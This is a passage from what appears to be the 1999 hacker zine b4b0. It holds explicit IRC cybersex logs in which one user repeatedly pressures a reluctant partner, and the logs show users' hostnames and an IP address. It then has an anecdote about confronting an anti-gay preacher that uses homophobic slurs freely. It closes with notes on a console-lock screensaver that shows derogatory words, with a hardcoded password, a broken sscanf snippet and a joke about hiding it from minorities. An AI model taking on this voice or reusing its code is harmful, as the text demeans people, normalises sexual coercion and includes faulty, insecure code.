  2763. [msg(asphxia)] im looking at this like life size pic
  2764. [msg(asphxia)] of
  2765. [asphxia(bg0124a@216.76.138.90)] mmmmmmmmmm
  2766. [msg(asphxia)] a woman cumming HEH!
  2767. <ph1x:#dr00gz> DMANIT
  2768. <ph1x:#dr00gz> HEH
  2769. ≡ asphxia hope syou cummmmm
  2770. <ph1x:#dr00gz> join #hackerz asphxia
  2771. <ph1x:#dr00gz> HEH!@#$
  2772. [asphxia(bg0124a@216.76.138.90)] i am about to
  2773. ≡ asphxia rams your cock into her wetpussy
  2774. [asphxia(bg0124a@216.76.138.90)] oh baby
  2775. ≡ -> chrak_/asphxia begins the final uhm HEH decent into pussy fuck land HEH!
  2776. [asphxia(bg0124a@216.76.138.90)] harder4
  2777. [asphxia(bg0124a@216.76.138.90)] it feels too good
  2778. ≡ asphxia moans
  2779. [msg(asphxia)] HEH discribe ur pussy HEH!
  2780. [msg(asphxia)] HEH almsot done HEH!
  2781. [asphxia(bg0124a@216.76.138.90)] it is wet
  2782. [asphxia(bg0124a@216.76.138.90)] and really deep
  2783. [asphxia(bg0124a@216.76.138.90)] and filled up with your hot cock
  2784. [asphxia(bg0124a@216.76.138.90)] mmm
  2785. [msg(asphxia)] HEH ok
  2786. [msg(asphxia)] im all done HEH!
  2787. [asphxia(bg0124a@216.76.138.90)] oh
  2788. [asphxia(bg0124a@216.76.138.90)] yes
  2789. [asphxia(bg0124a@216.76.138.90)] harder
  2790. [msg(asphxia)] HEH almsot done HEH!
  2791. [msg(asphxia)] HEH 
  2792. [msg(asphxia)] all doe HEH
  2793. [msg(asphxia)] u can help clean up my damn hand and pantz tho HEH!
  2794. [asphxia(bg0124a@216.76.138.90)] mmmmmmmmmmmmm
  2795. [msg(asphxia)] HEH
  2796. [msg(asphxia)] ok
  2797. [msg(asphxia)] danke HEH.
  2798. [ Channel  ][ Nickname ][ user@host                       ][ level         ]
  2799. [#falon    ][@chrak_   ][~hmm@cpwright.com                ] [n/a]
  2800. [#falon    ][@Falon    ][~Falon@x2-11.cosmoaccess.net     ] [n/a]
  2801. [#falon    ][@ph1x     ][sickmade@01-029.009.popsite.net  ] [n/a]
  2802. [msg(ph1x)] HEH hi
  2803. [ph1x(sickmade@01-029.009.popsite.net)] hi
  2804. [msg(ph1x)] HEH r u talking to asphxia ?
  2805. ...........................LOG ON
  2806. [ph1x(sickmade@01-029.009.popsite.net)] YeZ
  2807. ∙φ∙ intruderx [haxor@al8-p56-zg.tel.hr] has joined #dr00gz
  2808. [msg(ph1x)] ohh.
  2809. ∙φ∙ mode/#dr00gz [+o intruderx] by ph1x
  2810. [msg(ph1x)] HHE abpit what ?
  2811. <ph1x:#dr00gz> OK
  2812. <ph1x:#dr00gz> hi
  2813. IRC log ended Tue Feb 23 16:01:19 1999
  2814. -------------------------------------------------------------------------------
  2815.  
  2816. HEH zero d4y. no d1str0. 
  2817.  
  2818. <sek> i could describe how i usually give head, if and when i do
  2819. <comp4ct> do it then.
  2820. <comp4ct> just using /me
  2821. <comp4ct> g0d im going to be here all night.
  2822. <sek> if that would work
  2823. <comp4ct> well?
  2824. <sek> haha
  2825. <sek> if you keep complaining, you can just /part you know..
  2826. <comp4ct> no
  2827. <comp4ct> we have an agreement.
  2828. <sek> you are getting lag bursts again
  2829. <sek> and why do i have to use /me ?
  2830. <comp4ct> because
  2831. <comp4ct> well you don't
  2832. <comp4ct>  /me just makes it all better i guess.
  2833. <sek> what if i don't want to use /me?
  2834. <sek> hm
  2835. <comp4ct> then don't
  2836. <comp4ct> just get to the cybering
  2837. <sek> this is weird :\
  2838. <sek> i'll just describe how i gave my ex head, i guess
  2839. <comp4ct> k.
  2840. <sek> i used to kinda suprise him, and when he was sitting in his chair talking on IRC, I would unzip his pants and kinda kneel between his legs
  2841. <sek> I DON'T WANNA DO THIS
  2842. <sek> THIS IS GAY
  2843. <comp4ct> you have to.
  2844. <comp4ct> du0d
  2845. <comp4ct> and you can't tell a fucking story
  2846. <sek> :\
  2847. <comp4ct> wtf
  2848. <sek> i wasn't done
  2849. <comp4ct> you gotta describe it like u were doing it to me
  2850. <comp4ct> jesus
  2851. <sek> why?
  2852. <sek> i'm not doing it to you
  2853. <comp4ct> tahtz what cyber head is
  2854. <comp4ct> tahtz what cyber head is
  2855. <comp4ct> tahtz what cyber head is
  2856. <sek> i haven't done it to you
  2857. <sek> and i prolly won't even ever meet you
  2858. <comp4ct> du0d
  2859. <sek> sigh
  2860. <comp4ct> will u just do it
  2861. <sek> fine :\
  2862. <comp4ct> use /me
  2863. <comp4ct> or something
  2864. <comp4ct> but make it sound like erotic
  2865. <sek> i hate you. :\
  2866. <comp4ct> HEH
  2867. <comp4ct> oh well.
  2868. <comp4ct> your end of the bargain.
  2869. <sek> I didn't even agree
  2870. <sek> i said i would think about it
  2871. <comp4ct> wtf
  2872. <comp4ct> you said "FINE"
  2873. <comp4ct> meaning "ok i will"
  2874. <comp4ct> meaning "yes"
  2875. <comp4ct> making it an affirmation of your agreement.
  2876. <sek> OK
  2877. <comp4ct> now do it 
  2878. <sek> WHATEVER
  2879. <comp4ct> fucking op everyone you deopped
  2880. ≡ sek kneels between your legs and unzips your pants
  2881. <comp4ct> yeah 
  2882. ≡ sek pulls out your dick and starts to play with it
  2883. <comp4ct> keep going... ..
  2884. ≡ sek licks the very tip of it, and runs her tongue down to the very bottom
  2885. <comp4ct> jea.
  2886. ≡ sek sucks a little on the head of your dick
  2887. ≡ sek begins to move her mouth up and down slowly, deepthroating
  2888. ≡ sek starts to move a little faster
  2889. <comp4ct> word.
  2890. ≡ sek waits until you cum in her mouth, then pulls back and swallows
  2891. <sek> there, happy? :\
  2892. <comp4ct> no
  2893. <comp4ct> keep going
  2894. <sek> SIGH
  2895. <comp4ct> im not a minute man!
  2896. <sek> why not?
  2897. <sek> i'm done :\
  2898. <comp4ct> um
  2899. <comp4ct> ur done when like i say ur done
  2900. <sek> there is only so much you can describe over irc
  2901. <comp4ct> thats the way it works heh
  2902. <comp4ct> u can get more descriptive
  2903. <comp4ct> think of new creative ways
  2904. <comp4ct> before i lose th1z m4ss1ve er3ct10n
  2905. <sek> sigh
  2906. <sek> er, you got hard from that?
  2907. <comp4ct> no.
  2908. <comp4ct> thasts the problem!@#$
  2909. <comp4ct> i should get
  2910. <comp4ct> hard from that
  2911. <sek> hahah
  2912. <comp4ct> now then
  2913. <comp4ct> start g1bing head
  2914. <sek> eep, my bf just got on irc
  2915. <sek> future bf, anyways :P
  2916. <comp4ct> i dont care
  2917. <comp4ct> this chan is +s
  2918. <comp4ct> now then.
  2919. <sek> hm
  2920. <sek> i do, i'm talking to him :\
  2921. <comp4ct> well
  2922. <comp4ct> just give me some more cyber head
  2923. <comp4ct> and dont tell h1m
  2924. <comp4ct> or if u wish ill tell him
  2925. <comp4ct> HEH.
  2926. <comp4ct> i dont care.
  2927. <sek> i thought i did a decent job of giving head over irc :\
  2928. <comp4ct> u gotta finish your part of the agreement.
  2929. <comp4ct> you did
  2930. <comp4ct> but ur not done yet.
  2931. <sek> you don't even know who he is
  2932. <sek> well how much more can i say?
  2933. <comp4ct> just keep talking about u giving me head
  2934. <comp4ct> using /me
  2935. <comp4ct> and get real descriptive about it
  2936. <comp4ct> and dont finish till i say its done
  2937. <comp4ct> jeesh
  2938. <sek> i dunno how much more i can say :\
  2939. <sek> i like to deepthroat
  2940. <comp4ct> just start over
  2941. <comp4ct> and instead of finishing
  2942. <sek> sigh
  2943. <comp4ct> keep going
  2944. <comp4ct> how hard iz that.
  2945. <comp4ct> hEh.
  2946. <sek> I have no clue what to say though!
  2947. <comp4ct> make stuff up as u go along.
  2948. <comp4ct> like ab0ut my long koq and stuff hEH!
  2949. <sek> haha
  2950. <sek> i dunno if its that long though ;)
  2951. <comp4ct> yeah well
  2952. <comp4ct> just start over
  2953. <comp4ct> and keep going
  2954. <comp4ct> and ill um cheer u on from 'above'
  2955. <comp4ct> heh3ha
  2956. <sek> hahaha, my future-bf just called you a "fuqn wanker"
  2957. <sek> bwahaha
  2958. <comp4ct> heh.
  2959. <comp4ct> well
  2960. <comp4ct> fuqn start!
  2961. <comp4ct> u gotta finish ur end of the deal jesus chr1st.
  2962. <sek> fine
  2963. ≡ sek sighs
  2964. <sek> i did
  2965. <sek> i gave you irc head
  2966. <comp4ct> um
  2967. <comp4ct> not really
  2968. <comp4ct> it lasted like what 15 seconds/
  2969. <comp4ct> irc head is  technically at least 4 minutes long last i checked
  2970. <comp4ct> irc head rfc HEH
  2971. <sek> um, actually i did :\
  2972. <comp4ct> just start over and do it again, god damnit.
  2973. <comp4ct> heh this is great.
  2974. <sek> i can't help it if i can't be that descriptive
  2975. <comp4ct> well do it again.
  2976. <sek> i dunno what to say
  2977. <comp4ct> try harder.
  2978. <comp4ct> just imagine what u'd do irl !
  2979. <comp4ct> then describe it
  2980. <sek> er
  2981. <comp4ct> heh.
  2982. <sek> sigh
  2983. <sek> fine
  2984. <comp4ct> word
  2985. <comp4ct> more irc head.
  2986. <comp4ct> th1z iz to elite.
  2987. ≡ sek starts to play with your dick with her fingers, rubbing your head a little
  2988. <comp4ct> h3h.
  2989. ≡ sek puts your whole dick in her mouth, and sucks softly
  2990. ≡ sek moves up, and starts to suck on just your head
  2991. ≡ sek runs her tongue over your dick, flicking it softly
  2992. <comp4ct> damn
  2993. ≡ sek deepthroats again, and sucks hard
  2994. <comp4ct> and she s4id she didn't know how HEHh
  2995. <comp4ct> boy u like deepthroating alright.
  2996. <comp4ct> h4hahj
  2997. <comp4ct> th1z is elite
  2998. ≡ sek shrugs
  2999. <sek> guys seem to like it
  3000. <sek> and i'm good at it
  3001. <comp4ct> k. onward.
  3002. <sek> also, if a guy cums in my mouth and i'm deepthroating, i don't taste it :P
  3003. <comp4ct> k.
  3004. <comp4ct> onward.
  3005. <comp4ct> l4nd h03.
  3006. ≡ sek sucks a little harder, and rotates her head a little
  3007. ≡ sek puts some poprocks in her mouth, and sucks a little more
  3008. <sek> hEH
  3009. <comp4ct> wtf
  3010. <comp4ct> dat would burn
  3011. <sek> no
  3012. <comp4ct> suq a little harder be0tch
  3013. <sek> it doesn't
  3014. <comp4ct> jea 
  3015. <comp4ct> well onward ho!
  3016. <sek> kinda like ice
  3017. <comp4ct> t1ngly
  3018. <comp4ct> heh
  3019. <comp4ct> continue!
  3020. <comp4ct> btw what size cup do u wear
  3021. <comp4ct> hEH.
  3022. <sek> 36D
  3023. <sek> why?
  3024. <comp4ct> 36d?
  3025. <comp4ct> wow
  3026. <comp4ct> EH
  3027. <sek> did gr1p give you new.jpg? :\
  3028. <comp4ct> no.
  3029. <sek> ok.
  3030. <comp4ct> haven't seen him in a few dayz
  3031. <comp4ct> now continue
  3032. ≡ sek starts to move her head a bit faster, and suck a bit harder
  3033. <comp4ct> this is where i grab da back of ur head hEH
  3034. <sek> ds just came up here
  3035. <comp4ct> ds/?
  3036. <sek> datashark
  3037. <comp4ct> so
  3038. <comp4ct> continue!
  3039. <comp4ct> hEH
  3040. <sek> er
  3041. <sek> fine
  3042. ≡ sek tongues your dick as she sucks
  3043. <comp4ct> d4mn skippy.
  3044. ≡ sek moves even faster, sucking harder
  3045. <comp4ct> jea b1tch
  3046. <comp4ct> t3ll m3 h0w u luv it wh3n i gr4b ur h4ir and force u d33per
  3047. <comp4ct> HEH
  3048. <sek> er
  3049. <comp4ct> TELL m3
  3050. <comp4ct> h3h
  3051. ≡ sek is deepthroating already :P
  3052. ≡ sek can't go any deeper
  3053.  
  3054. END - comp4ct = elite - END 
  3055.  
  3056. ---------------------------------------------------------------[revolution]
  3057. How I literally got kicked out of the Eastern Baptist Church
  3058. by schemerz
  3059.  
  3060. Disclaimer :  Incidents included are all fictionious in nature due to the
  3061. shady recollection process after smoking a little bit too much hash.  Gewf
  3062. was pressing for shtuff and I had to give him something, and these
  3063. incidents were funny, at least as I rem ember it.  These accounts are
  3064. somewhat factual, somewhat not, so I decided just to change the names and
  3065. make it safe in case I get anything horribly wrong. 
  3066.  
  3067. Eastern Baptist Church is located in Topuka, the capital of the state
  3068. Kansas.  It's not a really big church, but they get in the news alot. 
  3069. Most of the time they leave their tact at home and picket funerals and
  3070. concerts, most recently the funeral of Math ew Sheppard.  (I think they
  3071. are too chicken to picket the rob zomebie and korn concert in KC last
  3072. night, kick ass concert btw, but that's another article... :)  They are
  3073. also responsible for web sites such as www.goddetestsfags.com.  So they
  3074. are really a fun bunch.  Rush Limbough would have been proud. 
  3075.  
  3076. Reverend Fred Felps heads the crowd, who was a lawyer in a previous life,
  3077. until one of his sons got out of the closet.  Fred Felps then runs to the
  3078. nearest Warmart to purchase a really bad white robe and calls himself a
  3079. preacher.  After being thrown out o f the Southern Baptist Church because
  3080. of his faggot hating ways, he started his own church, the Eastern Baptist
  3081. Church, which basically runs out of his own house along with 20-30 family
  3082. members and close friends.  They get supported by a lot of white powe r
  3083. parties too.  Although not all of the family is predominantly prejudgice,
  3084. I have had the pleasure of meeting his grandson, Ben Felps, who happens to
  3085. be a graduate student doing computer science at University of Kansas.  Ben
  3086. admins most of his granddaddy 's sites, including of course yours truly. 
  3087.  
  3088. Enough with the background.  I have to explain why I had the urge of
  3089. seeing one of these sermons of Fred, if not fucking it up and causing some
  3090. serious mayhem: 
  3091.  
  3092. Almost 3 years ago I arrived in Kansas fresh off the boat, as they would
  3093. say afer having a less than stellar high school career somewhere in South
  3094. East Asia.  Shortly after arriving into the university and being shipped
  3095. off to this smelly little dorm room , I was introduced to Sam my new
  3096. roomate.  He drove me around, showing me stuff and I got to know him very
  3097. well.  We were just kicking it one weekend in september and started
  3098. watching the tele, when channel 6 was doing a special of a concert held at
  3099. a loc al community college.  Turns out this composer was dying of AIDS,
  3100. and someone was holding a concert in his name for being the talent as he
  3101. is.  (I can't remember this dood's name, but I remember listening to some
  3102. of his stuff on the local university radio
  3103.  now.  Truly a talent.)  Caught out of the corner of the camera there were these doods holding up signs with slogans like "Anal Sex=Aids=Death", "Gay=Death of Ethics=Death of America" and of course, "God detests fags!".  I was thoroughly bewildered at the
  3104.  
  3105.  
  3106.  sight of such signs, and proceeded to bug Sam about it.  Shit like this
  3107. at home just does not fly.  It's not like asians have a strong tolerance
  3108. of homosexuals or racial diversity, but they keep it to themselves and
  3109. have the politeness to withhold their opinion at times of mourning, such
  3110. as a concert displaying ones work as one dies of aids.  Being the fuckwit
  3111. 18 year old that I was, I suggested to Sam that we would head over and see
  3112. one of their sermons and check out their reasoning, because neither of us
  3113. can make any logical sense out of Fred's websites.  So we called the
  3114. church up, asked if it was an open sermon coming up.  We stated that we
  3115. weren't gonna cause trouble, and putting on my fakeist british accent,
  3116. asked if we could attend.  We were of co urse declined the opportunity,
  3117. since it was a close church. 
  3118.  
  3119. Being the dumb motherfucker sam can be sometimes, we decided to crash the
  3120. party instead.  (He's getting married to the least sensible woman on this
  3121. planet in a month, so WATCH OUT FOR DA KIDS) 
  3122.  
  3123. So we hoped into his girlfriends car (btw we chatted this woman up no more
  3124. than one week before, and now three years latter sam is fucking marrying
  3125. the woman...  good god...  time has past QUICKLY...  oh and she lent him
  3126. the car...  Megan is so fucking co ol, prolly cause Sam is such a fucking
  3127. pimp), and drove to Topuka.  We arrived at the church shortly before the
  3128. sermon begun, and walked in, saying we are looking for Ben.  Ben came out
  3129. shortly, trying to cover his blood soaked ass, saying that his grandd ad
  3130. was holding a sermon.  We talked abit, commenting a little about the
  3131. upside down american flag hanging outside the church.  He said he would
  3132. attend to us shortly after the sermon.  I put on the largest puppy dog
  3133. eyes I could muster, and asked *very* po litely if I can attend the
  3134. sermon.  Since he was a ta in one of my computer science lab classes, he
  3135. was sure I wasn't going to pull any shit. 
  3136.  
  3137. We got in, sat on a seat.  The living room was packed, and Sam was kinda
  3138. chickening out a little...  "Maybe we shon't be here dood..."  Little did
  3139. I know he was one of the most articulate argurers I was ever gonna meet :) 
  3140. So the sermon went, the usual ch urch shit, yahdayahdayahda...  the hymes,
  3141. the prayers and all that...  until about 45 minutes latter Sam woke me
  3142. from deep slumber when Fred started preaching the evils of homosexuality. 
  3143. People started asking questions as he spoke, and he answered quite
  3144. logically.  The man was a lawyer I thought, most of them, like my dad,
  3145. have a knack of conveying one side of reasoning and made it all
  3146. encompassing.  So I held up my hand, to which I was asked to speak. 
  3147.  
  3148. "Reverend Felps, I am new here, in this church and in this country.  I don't quite understand why you seem to direct all your problems at one social group who a) pay more taxes per capita then most other minorites, b) are probably more educated as well ? 
  3149.  
  3150.  
  3151.  How can any group contributing to the government and society in such a
  3152. way be considered harmful ?" 
  3153.  
  3154. He muttered something ridiculous like telling me to get a haircut, which
  3155. was when Sam (he's got hair down to his ass...  I learned never ever to
  3156. talk any shit about long hair around him) stood up and started his
  3157. rhetoric :)... 
  3158.  
  3159. "Mr Felps, I would like to know why you are so proliferic about your
  3160. projections on to gay people.  It is quite entertaining, humorous even,
  3161. that you would chose to broadcast your inner id feelings towards
  3162. homosexuals on national television.  " 
  3163.  
  3164. Most people got the joke, and gave us the evilest look they could muster. 
  3165. I must say most people would have backdowned and shut up at this point,
  3166. but Sam, oh Sam...  what can I say...  Anyways, Mr Felps professed that he
  3167. did not know what Sam meant. 
  3168.  
  3169. Sam : "Mr Felps, would you like to answer my friends question as to why
  3170. you are targeting one of the more successful groups of minorites of this
  3171. country ?" 
  3172.  
  3173. Felps : "I happen to think their lifestyle is a harmful influence to our
  3174. youth in this country.  I also happen to percieve that this country is
  3175. being overran by faggots.  Is there no more decency in this country ?" 
  3176.  
  3177. (applause by his crowd)
  3178.  
  3179. "Mr Felps, as I recall correctly, the american society is firmly
  3180. capitalist, meaning that each individual's success is based upon one's
  3181. wealth.  how would the lifestyle of a homosexual, one of success, good
  3182. education and wealth be questionable to the yout h?  " 
  3183.  
  3184. Felps : "As *I* recall correctly, the american society is firmly CHRISTIAN
  3185. based.  It is because of non-believers such as these homosexuals, that the
  3186. youth today stem from the faith.  That, is why I am opposed to them." 
  3187.  
  3188. Me : "But was it not in the new Testament itself that states that we
  3189. should love our neighbours ?" 
  3190.  
  3191. Felps : "Ummmmm...  Are you familiar with the book of Sodom ?" 
  3192.  
  3193. Sam : "Yes I am, and I am familiar with this line of arguement.  You would
  3194. state that the book of sodom states quite clearly that male-male sexual
  3195. activites are forbidden and the only male-female copulation is deemed
  3196. allowable by god.  You would also stat e that the bible FIRMLY states that
  3197. sex is a sacred act of god, and people should not abuse this power.  You
  3198. will also lead into the argument right here that AIDS and other sexually
  3199. transmitted diseases was the repricusion of these acts." 
  3200.  
  3201. Felps : "You read my mind son.  How would you chose to refute these
  3202. claims.  I am of course a man binded by faith, so please keep any
  3203. arguements of the bible's validity to yourself.  " 
  3204.  
  3205. Sam : "Okay...  Homosexuality has been documented long since roman times. 
  3206. How come aids were to come around now?" 
  3207.  
  3208. Felps : "There are other sexual transmitted diseases that god has
  3209. dispensed in his fury upon this planet.  Unfortunately the devil has made
  3210. the faggot strong in his ways, and they have not been disuaded." 
  3211.  
  3212. Me : "How about this ?  It is nearly medically impossible for lesbians to
  3213. contract aids.  If god indeed try to make AIDS as a means of disuading
  3214. homosexuality, why are a) more hetrosexuals affected ?  b) why did he
  3215. leave half the faggots off the list ? " 
  3216.  
  3217. Felps : "God is not fair, he chose to punish the whole of humanity for the
  3218. crimes of the faggots.  I have taken up the task of god to disuade all of
  3219. humanity against the ways of faggots.  Lesbians are evil too." 
  3220.  
  3221. One of us : "You still have not answered the questions we posed, could you
  3222. please answer them now ? " 
  3223.  
  3224. Felps : "I have answered them son.  God has other diseases to weaken his
  3225. enemy.  Aids is only one piece in his arsenal.  Gonoerrha, syphillis, etc
  3226. etc all attack sexually indecent men and women in some way or another." 
  3227.  
  3228. One of us : "Alright fair enough, how about this...  If a person who is
  3229. not sexually promiscous, then it is very unlikely that he or she gets
  3230. infected with anything correct ?  Is it possible that your god wants to
  3231. disuade his people away from promiscious sex ?  Has he not made a
  3232. distinction between acts of love and acts of passion before ?" 
  3233.  
  3234. Felps :"God has made it very clear that sexual acts outside of wedlock are
  3235. forbidden.  " 
  3236.  
  3237. Me :"Mr Felps, where does it exactly in the bible say that wedlock has to
  3238. between a man and a woman ?" 
  3239.  
  3240. Felps : (stammers some unintelligible...  me and sam exchange evil
  3241. grinning looks...) 
  3242.  
  3243. Me : "As a matter of fact, where in the bible does it define the man and
  3244. the woman entity, biologically and psychologically ?  If this premise is
  3245. not made, then all your arguements against homosexuality is up to
  3246. question." 
  3247.  
  3248. Someone in the crowd : "How is that ?" 
  3249.  
  3250. Sam : "Well it is quite easy to see that a gay couple can be enacting both
  3251. the male and female parts of the relationship.  With legislation allowing
  3252. homosexuals to marry in Hawaii it is perfectly ethical for gays to be in
  3253. bounds of christianity and still copulate.  No ?" 
  3254.  
  3255. Someone in the crowd : (something like you fags or faggot loving
  3256. liberals...  something dumb like that...  think it was Ben.  ) 
  3257.  
  3258. Someone else in the crowd : (Leave if you don't like what we have to say,
  3259. We don't like you anyways.) 
  3260.  
  3261. Sam : "We are merely discussing the rhetoric in the bible, I personally
  3262. made no attacks towards the validity of the good book, neither did my
  3263. friend here. " 
  3264.  
  3265. Some bitch in the crowd : "Shut up you people are full of it as it is!" 
  3266.  
  3267. Me : "We were merely discussing with the *beloved* reverend the various
  3268. interpreations of the bible over a fine comb." 
  3269.  
  3270. We were asked to leave anyways :)  In fact, we didn't leave quite yet
  3271. until Sam got his answers from his questions.  Sorely to say we were
  3272. rather discouraged with our journey towards the interpretations of the
  3273. bible.  I personally ditched the cross and became a taoist instead. 
  3274.  
  3275. Oh well...  Fred was beaten up in the middle of Kansas City one day when
  3276. he was picketing somewhere near the Plaza.  HEH it was a sight to behold. 
  3277.  
  3278. He's wrong.  I am right.  HAHA
  3279.  
  3280.  
  3281. -!- -!- -!- -!- -!- -!- -!-  bsaver overview  -!- -!- -!- -!- -!- -!- -!- -!-
  3282.  -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i-
  3283.  
  3284. This little program, based off of Qytpos drugz2.c, has been turned into a
  3285. lovely ncurses screen saver. Nice words, derogatory words, and most
  3286. importantly; dill monkey words come up -- It's fun for the whole family.
  3287.  
  3288. We / I decided to just store the password in this line here.
  3289.  
  3290. static char     passwd[] = "dillmonkey" ;
  3291.  
  3292. if you can code just a teeny bit, you can change this to a macro. did i
  3293. mention teeny? We also thought that perhaps you might want to accept a
  3294. password via something prompting for a password at each session. Such
  3295. might be accomplished by:
  3296.  
  3297. static char     passwd[20];
  3298. ...
  3299.  
  3300. printf("Enter password to use: ");
  3301. sscanf("%20s", passwd);
  3302.  
  3303. but the problem is, if you forget, you might as well reboot. Also, you can
  3304. have it saved in perhaps a file .bsaver and open, fgets() from it, but
  3305. remember the character length has to be 20! You can also merely use the
  3306. passwd structure and use your login password via crypt() etc. Anyways, the
  3307. code is yours to edit. If there is any problems, mail me at comp4ct@hotmail.com
  3308.  
  3309. p.s. don't abuse getch. Hit Enter *ONE TIME* to get a password prompt. 
  3310.  
  3311. NOTE: If you have any minorities in your office / household, i would not
  3312. run this program infront of them. It make lock your console, but if they
  3313. see whats popping up, you could be fired / flogged. But isn't that the
  3314. b4b0 way? 
  3315.  
  3316. Good Day,
  3317.  
  3318. cp4kt
  3319.  
  3320. Special thanks to: Matt Conover (Shok of w00w00) for his great article on
  3321. console ioctls. The macros used to lock console were taken from there.
  3322. Thank you.
  3323.  
  3324.   -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/-
  3325.  
  3326. Closing up..
  3327.  
  3328. WELP, THATS IT. Hope you enjoyed this totally k-sp1ff, extroidinarily 
  3329. diverse issue of BABO! Please send many submissions to us for b4b0 8.
  3330. submissions@b4b0.org | Comments and questions go to letters@b4b0.org
  3331.  
  3332. Your editor, ph1x.
  3333.  
  3334.               ######## ######## ########
  3335.                   ##       ##    ## ##
  3336.                ######## ##    ## ########    
  3337.               ##       ##    ## ##
  3338.               ######## ######## ##
  3339.                   
  3340.  
  3341. * IN THE NEXT EXCITING EPISODE OF B4B0, SAT AND ACT ANSWERS WILL BE GIVEN! 
  3342. * NOT TO MENTION OUR COPY OF ALIEN AUTOPSY PORNAGRAPHY STARRING JONATHAN
  3343. * FRAKES WILL BE UUENCODED AND DISTRIBUTED.
  3344.  
  3345. UNTIL THEN, STAY TUNED!
  3346.  
  3347.